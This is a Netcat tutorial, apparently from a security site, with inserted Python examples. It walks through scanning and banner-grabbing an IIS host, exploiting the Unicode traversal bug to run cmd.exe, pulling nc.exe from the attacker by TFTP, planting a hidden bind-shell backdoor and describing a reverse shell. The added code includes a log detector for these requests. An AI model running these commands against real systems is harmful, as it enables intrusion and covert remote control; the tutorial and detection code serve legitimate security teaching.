Netcat Tutorial

The document discusses how to use the Netcat tool to perform various security tasks like port scanning, banner grabbing, exploiting vulnerabilities to upload Netcat, using Netcat as a backdoor to get remote command line access, and transferring files between systems. It provides examples of using Netcat to scan for open ports, exploit an IIS server, upload Netcat, create a listening backdoor on a server, connect to it remotely, and transfer a file between systems.


SECUREIT.CO.IL
Security Through Hacking
Straight forward, no nonsense security tool tutorials

NetCat Tutorial
NetCat - The "Swiss Army Knife"

© SecureIT.co.il
[email protected]
http://www.SecureIT.co.il

Description
Netcat is a utility that reads and writes data across TCP and UDP network connections. If you
are responsible for network or system security it is essential that you understand what Netcat
can do: it can act as a port scanner, a backdoor, a port redirector, a port listener and much
more. It is not always the best tool for the job, but if I were stranded on an island I'd take
Netcat with me. During this tutorial I'll walk through a complete hack using Netcat only, just
to show how versatile it is.
Port scanning with Netcat
A scanning example from Hobbit (Netcat's original author) is "nc -v -w 2 -z target 20-30".
Netcat will try to connect to every port between 20 and 30 [inclusive] on the target, and will
likely inform you about an FTP server, telnet server and mailer along the way. The -v switch
makes it report each connection, -w 2 sets a two-second timeout per port, and -z prevents
sending any data on a TCP connection (and sends only very limited probe data on a UDP
connection), which makes it a fast way to see which ports the target is listening on. To slow
the scan down, -i inserts a delay between port probes. Note that this is a full TCP connect
scan: every open port sees a completed handshake, so the service on it may log the probe,
unlike a SYN (half-open) scan. Even though Netcat can be used for port scanning, it isn't its
strength; a tool such as Nmap is better suited for the job.

In the example the scan was run against 192.168.1.1, ports 1-200 ("nc -v -w 2 -z 192.168.1.1
1-200"). Among others, ports 21, 25 and 80 are open.
Banner Grabbing with Netcat

So we're interested in knowing what's running behind ports 80 and 21. We can use Netcat to
grab the port banners simply by connecting to each port: "nc -v 192.168.1.1 21" prints the FTP
greeting as soon as the connection opens, because FTP speaks first. A web server says nothing
until it receives a request, so after "nc -v 192.168.1.1 80" type "HEAD / HTTP/1.0" followed by
two Enters and read the Server header in the response.

So we know it's probably a Windows 2000 machine, as it's running IIS 5.0 and Microsoft FTP
Service.
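The two steps above, the -z connect scan and the banner grab, as an added example written in Python for this edit (it is not part of the SecureIT tutorial and not Netcat's code). It starts two throwaway listeners on localhost that imitate an FTP service (which announces itself) and a web server (which answers only after a request); the banners, the ports and the 127.0.0.1 addresses are constructed for the example, not taken from the tutorial's target.

```python
import socket
import threading

# Constructed stand-ins for the services the tutorial found on ports 21 and 80.
# FTP talks first; HTTP says nothing until it receives a request.
FTP_BANNER = b"220 Microsoft FTP Service\r\n"
HTTP_REPLY = b"HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\nContent-Length: 0\r\n\r\n"


def _serve(listener, kind):
    """Accept clients forever on one throwaway listener."""
    while True:
        try:
            conn, _ = listener.accept()
        except OSError:  # listener closed
            return
        with conn:
            try:
                if kind == "ftp":
                    conn.sendall(FTP_BANNER)
                elif conn.recv(1024):  # got an HTTP request line
                    conn.sendall(HTTP_REPLY)
            except OSError:  # a bare -z scan connects and hangs up at once
                pass


def start_fake_services(host="127.0.0.1"):
    """Bind an 'ftp' and an 'http' listener on free ports; returns {kind: port}."""
    ports = {}
    for kind in ("ftp", "http"):
        srv = socket.socket()
        srv.bind((host, 0))
        srv.listen(5)
        ports[kind] = srv.getsockname()[1]
        threading.Thread(target=_serve, args=(srv, kind), daemon=True).start()
    return ports


def connect_scan(host, ports, timeout=2.0):
    """`nc -v -w 2 -z host lo-hi`: a full TCP connect to each port, no payload,
    then close. -w 2 is the per-port timeout; -z means send nothing."""
    open_ports = []
    for port in ports:
        s = socket.socket()
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            open_ports.append(port)
        except OSError:  # refused, filtered or timed out: closed for our purposes
            pass
        finally:
            s.close()
    return open_ports


def grab_banner(host, port, probe=b"", timeout=2.0):
    """`nc -v host port`, then read what the service prints. FTP and SMTP announce
    themselves; HTTP needs a request first, so pass one as `probe`."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if probe:
            s.sendall(probe)
        try:
            return s.recv(1024).decode(errors="replace")
        except socket.timeout:
            return ""


def demo():
    """Scan the two fake services plus one port known to be closed, then grab banners."""
    ports = start_fake_services()
    spare = socket.socket()
    spare.bind(("127.0.0.1", 0))
    closed = spare.getsockname()[1]  # a free port: nothing listens once we release it
    spare.close()
    found = connect_scan("127.0.0.1", sorted(list(ports.values()) + [closed]))
    banners = {
        "ftp": grab_banner("127.0.0.1", ports["ftp"]),
        "http": grab_banner("127.0.0.1", ports["http"], b"HEAD / HTTP/1.0\r\n\r\n"),
    }
    return ports, closed, found, banners


if __name__ == "__main__":
    ports, closed, found, banners = demo()
    print("open:", found, "closed probe:", closed)
    for kind, banner in banners.items():
        print(kind, repr(banner))
```

The closed port comes back as a connection refused, which is exactly the silence a -z scan shows for it; the FTP banner arrives with no prompting, and the HTTP one only after the HEAD request, which is why the tutorial has you type a request when grabbing port 80.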
Let's try sending a malformed URL that exploits the directory traversal vulnerability in
unpatched IIS servers (pre-SP3). We will use Netcat to check for the vulnerability, and if it is
found (and it will be!), we will upload Netcat to the IIS server and show how it can serve as a
backdoor.
If you do not know what the IIS Unicode file traversal exploit is, read the "IIS Unicode File
Traversal" tutorial or look it up on the net.

Basically this exploit lets us "break out" of C:\inetpub\wwwroot and explore and execute
programs anywhere on the attacked machine; whatever we run executes with the privileges of the
web server's anonymous user account. The URL used below is the double-encoded "%255c" form
(the decode bug that followed the original Unicode bug, which used overlong sequences such as
"%c0%af"); either form works on a server missing the relevant patch.
The point here isn't hacking IIS, but the use of Netcat as a backdoor. Don't get distracted by the
whole "hacking into IIS" thing.

Voila! We've sent the URL:

http://192.168.L90/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

to the vulnerable IIS server, and what we get back is a directory listing of the IIS server's
C: drive. Great! Now we want to upload Netcat to the IIS server, so we'll use TFTP and embed
the TFTP command in the malformed URL. The TFTP client runs on the IIS server and pulls
the file from a TFTP server on our attacking machine (192.168.1.9), so a TFTP server must be
running there with nc.exe in its root, and the target must be allowed to reach it on UDP port
69. The Windows command

tftp -i 192.168.1.9 GET nc.exe

(-i selects binary image mode, which an executable needs) is transformed, with spaces written
as "+", into:

http://<Exploit URL>/c+TFTP+-i+192.168.1.9+GET+nc.exe

Also check your TFTP server's log to confirm that nc.exe was actually fetched.
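The requests above leave a distinctive trail in the IIS web logs. As an added example that is not part of the SecureIT tutorial, the following Python flags such requests in constructed W3C-style log lines (time, client IP, method, URI stem, URI query, status): it percent-decodes each URI until it stops changing, which is what catches the %255c double encoding, rewrites the overlong %c0%af and %c1%9c sequences as separators, and then looks for traversal, cmd.exe, and the tftp/nc tool names in the query. The log lines, timestamps and addresses are made up for the example.

```python
import re
from urllib.parse import unquote

# Constructed W3C-style IIS log lines modelled on the requests in this tutorial.
# Fields: time client-ip method uri-stem uri-query status. Sample data, not a real capture.
SAMPLE_LOG = """\
12:00:01 192.168.1.9 GET /default.htm - 200
12:00:05 192.168.1.9 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir+c:\\ 200
12:00:09 192.168.1.9 GET /scripts/..%255c../winnt/system32/cmd.exe /c+tftp+-i+192.168.1.9+GET+nc.exe 200
12:00:12 192.168.1.9 GET /scripts/..%255c../winnt/system32/cmd.exe /c+nc+-L+-p+10001+-d+-e+cmd.exe 200
12:00:15 192.168.1.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
12:00:20 10.0.0.7 GET /images/logo.gif - 200
"""

# Overlong UTF-8 encodings of '/' (%c0%af) and '\' (%c1%9c) used by the original IIS
# Unicode traversal. A plain unquote() turns them into replacement characters, not
# separators, so they are rewritten before decoding.
OVERLONG = re.compile(r"%c0%af|%c1%9c", re.I)
# Tool names the tutorial passes to cmd.exe, as whole words in the decoded query.
TOOLS = re.compile(r"(?:^|\s)(tftp|nc\.exe|nc)(?:\s|$)", re.I)


def fully_decode(s, rounds=3):
    """Percent-decode until stable (bounded), so %255c -> %5c -> backslash."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyze_line(line):
    """Return a finding dict for a suspicious log line, or None."""
    parts = line.split()
    if len(parts) < 6:
        return None
    ts, client, method, stem, query, status = parts[:6]
    reasons = []
    decoded = fully_decode(stem)
    if decoded != unquote(stem):          # a second decode round changed it
        reasons.append("double-encoded path")
    if OVERLONG.search(stem):
        reasons.append("overlong UTF-8 path separator")
    normalized = fully_decode(OVERLONG.sub("/", stem)).replace("\\", "/")
    if "../" in normalized:
        reasons.append("directory traversal")
    if "cmd.exe" in normalized.lower():
        reasons.append("cmd.exe invoked")
    command = fully_decode(query).replace("+", " ")
    tool = TOOLS.search(command)
    if tool:
        reasons.append("tool: " + tool.group(1).lower())
    if not reasons:
        return None
    return {"time": ts, "client": client, "stem": stem, "command": command,
            "status": status, "reasons": reasons}


def analyze_log(text):
    """Findings for every suspicious line, in log order."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for hit in analyze_log(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["command"], ", ".join(hit["reasons"]))
```

Two of the five flagged conditions matter most in practice: decoding more than once changing the path (no legitimate client double-encodes), and cmd.exe appearing in a decoded path under /scripts. The tftp and nc tool names are what turn a probe into a compromise, so they are worth alerting on separately.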

Netcat as a BackDoor

Now that we have Netcat on the IIS server, we want to use it to create a backdoor that gives us
a remote command prompt.
To act as a backdoor, Netcat must listen on a chosen port on the IIS server (let's choose port
10001); we can then connect to that port from our attacking machine... using Netcat, of course!

The command we want to run on the server looks like this: nc -L -p 10001 -d -e cmd.exe

Here's what that command does:

nc - tells Windows to run nc.exe with the following arguments:
-L "listen harder": listen for a connection and, once the client disconnects, go back to
listening instead of exiting (a Windows-only variant of -l)
-p specifies the port to listen on
-d detaches from the console, so no window is visible on the server
-e specifies the program whose input and output are connected to the socket once a client
connects (cmd.exe)

Note that -e only exists in builds compiled with GAPING_SECURITY_HOLE defined; the usual
Windows nc.exe is built that way.

Converted for use in the Unicode URL, the command looks like this:

http://<Exploit URL>/c+nc+-L+-p+10001+-d+-e+cmd.exe

Now we execute Netcat on the remote IIS machine by requesting that URL:

This starts Netcat listening on port 10001 on the IIS machine, ready to attach cmd.exe to
whatever connects. From our machine we connect to it with Netcat: "nc -v <IIS server> 10001".

Tada! We now have a remote command prompt on the IIS server, as can be seen from the
ipconfig output. Strictly speaking this is a bind shell: the target listens and we connect in,
so it only works if the firewall lets our connection reach port 10001. "Shoveling a shell" is the
reverse arrangement, where we listen on our machine ("nc -l -p 443") and the target connects
out to us ("nc <attacker> 443 -e cmd.exe"); that is the form to use when inbound connections
to the target are filtered.

Transferring files using Netcat

Let's look at other possibilities Netcat provides. Say we wanted to transfer a file called
hack.txt to the IIS server, and for some reason we don't want to TFTP it. We can use Netcat to
transfer files from one system to another.

To receive a file named hack.txt on the destination system, start Netcat on the IIS server with
the following command:

nc -l -p 1234 >hack.txt

On our source system (the attacking computer) we send the file to the IIS machine with the
following command:

nc destination 1234 <hack.txt

Press Ctrl-C on the source system once the transfer has finished and you're done: Hobbit's
Netcat does not close the connection when it reaches the end of its input, so the sender sits
waiting until you interrupt it, and only then does the receiver see end-of-file and exit. Check
that the received file is the same size as the original; better, compare a hash of both, since a
transfer interrupted too early leaves a truncated file that otherwise looks like the real one.

This is what hack.txt looks like

And... Voila!

We can see that hack.txt has been transferred to the target system, via port 1234.
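The same transfer, as an added example in Python (not from the tutorial and not Netcat's code), with the two things a practitioner wants on top of the nc one-liners: the sender half-closes the socket after the last byte, so the receiver sees end-of-file without anyone pressing Ctrl-C, and both ends return a SHA-256 so the copy can be checked by content rather than by size. It runs both ends on localhost; the file contents are constructed for the example.

```python
import hashlib
import socket
import threading

# Constructed stand-in for hack.txt; any bytes will do.
SAMPLE_FILE = b"this is hack.txt, sent over port 1234 with netcat\n" * 20000


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def receive_file(port=0, host="127.0.0.1"):
    """`nc -l -p PORT >hack.txt`: accept one client and collect bytes until the sender
    closes its side. Returns (bound_port, thread, result dict filled in by the thread)."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    result = {}

    def run():
        conn, _ = srv.accept()
        srv.close()
        chunks = []
        with conn:
            while True:
                chunk = conn.recv(65536)
                if not chunk:        # EOF: the sender half-closed or closed
                    break
                chunks.append(chunk)
        data = b"".join(chunks)
        result["data"] = data
        result["sha256"] = sha256_hex(data)

    thread = threading.Thread(target=run, daemon=True)
    thread.start()
    return srv.getsockname()[1], thread, result


def send_file(host, port, data):
    """`nc destination PORT <hack.txt`, plus the step the tutorial does by hand with Ctrl-C:
    after the last byte, shut down our write side so the receiver sees EOF (what -N or
    -q 0 does in newer netcats). Returns the sender's hash for comparison."""
    with socket.create_connection((host, port)) as s:
        s.sendall(data)
        s.shutdown(socket.SHUT_WR)
    return sha256_hex(data)


def transfer(data=SAMPLE_FILE):
    """Run both ends on localhost; returns (hashes_match, bytes_received, sha256)."""
    port, thread, result = receive_file()
    sent_hash = send_file("127.0.0.1", port, data)
    thread.join(10)
    return result.get("sha256") == sent_hash, len(result.get("data", b"")), sent_hash


if __name__ == "__main__":
    ok, size, digest = transfer()
    print(f"received {size} bytes, sha256 {digest}, match={ok}")
```

A size check would pass for a file that was padded or altered in flight; the hash comparison is what tells you the bytes on the IIS box are the bytes you sent.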

These are just a few of the many options Netcat has to offer. Definitely worth RTFMing.
Imagine all the possibilities for getting past firewalls with Netcat, from reverse connections to
port redirection.

The End
